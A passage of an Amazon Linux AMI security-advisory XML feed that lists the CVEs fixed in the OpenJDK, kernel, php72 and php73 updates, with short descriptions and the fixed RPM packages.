Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2756 OpenJDK: Incorrect handling of references to uninitialized class descriptors during deserialization (Serialization, 8224541)
1823215: CVE-2020-2756 OpenJDK: Incorrect handling of references to uninitialized class descriptors during deserialization (Serialization, 8224541)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2756" title="" id="CVE-2020-2756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2757" title="" id="CVE-2020-2757" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2773" title="" id="CVE-2020-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2781" title="" id="CVE-2020-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2800" title="" id="CVE-2020-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2803" title="" id="CVE-2020-2803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2805" title="" id="CVE-2020-2805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2830" title="" id="CVE-2020-2830" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.261-2.6.22.1.83.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1366</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1366: important priority package update for kernel</title><issued date="2020-05-11 20:43:00" /><updated date="2020-06-17 23:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12826:
A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.
1822077: CVE-2020-12826 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process
CVE-2020-12657:
An issue was discovered in the Linux kernel before 5.6.5. There is a use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body.
1832866: CVE-2020-12657 kernel: use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body
CVE-2020-10711:
A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the' ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference issue while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service.
1825116: CVE-2020-10711 Kernel: NetLabel: null pointer dereference while receiving CIPSO packet with null category may cause kernel panic
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10711" title="" id="CVE-2020-10711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12657" title="" id="CVE-2020-12657" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12826" title="" id="CVE-2020-12826" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1367</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1367: medium priority package update for php72</title><issued date="2020-05-08 20:28:00" /><updated date="2020-05-14 02:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7067:
In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), urldecode() function can be made to access locations past the allocated memory, due to erroneously using signed numbers as array indexes.
1827653: CVE-2020-7067 php: out-of-bounds read when using a malformed url-encoded string
CVE-2020-7066:
In PHP versions 7.2.x below 7.2.29, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while using get_headers() with user-supplied URL, if the URL contains zero (\0) character, the URL will be silently truncated at it. This may cause some software to make incorrect assumptions about the target of the get_headers() and possibly send some information to a wrong server.
1820604: CVE-2020-7066 php: information disclosure in function get_headers
CVE-2020-7064:
In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.34, while parsing EXIF data with exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead to information disclosure or crash.
1820601: CVE-2020-7064 php: information disclosure in exif_read_data() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7064" title="" id="CVE-2020-7064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7066" title="" id="CVE-2020-7066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7067" title="" id="CVE-2020-7067" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-pdo-dblib" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.30-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1368</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1368: medium priority package update for php73</title><issued date="2020-05-08 20:29:00" /><updated date="2020-05-14 02:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7067:
In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), urldecode() function can be made to access locations past the allocated memory, due to erroneously using signed numbers as array indexes.
1827653: CVE-2020-7067 php: out-of-bounds read when using a malformed url-encoded string
CVE-2020-7066:
In PHP versions 7.2.x below 7.2.29, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while using get_headers() with user-supplied URL, if the URL contains zero (\0) character, the URL will be silently truncated at it. This may cause some software to make incorrect assumptions about the target of the get_headers() and possibly send some information to a wrong server.
1820604: CVE-2020-7066 php: information disclosure in function get_headers
CVE-2020-7065:
In PHP versions 7.3.x below 7.3.16 and 7.4.x below 7.4.34, while using mb_strtolower() function with UTF-32LE encoding, certain invalid strings could cause PHP to overwrite stack-allocated buffer. This could lead to memory corruption, crashes and potentially code execution.
1820627: CVE-2020-7065 php: by using mb_strtolower() function with UTF-32LE encoding leads to potential code execution
CVE-2020-7064:
In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.34, while parsing EXIF data with exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead to information disclosure or crash.
1820601: CVE-2020-7064 php: information disclosure in exif_read_data() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7064" title="" id="CVE-2020-7064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7065" title="" id="CVE-2020-7065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7066" title="" id="CVE-2020-7066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7067" title="" id="CVE-2020-7067" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-bcmath" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.17" release="1.25.amzn1" epoch="0" 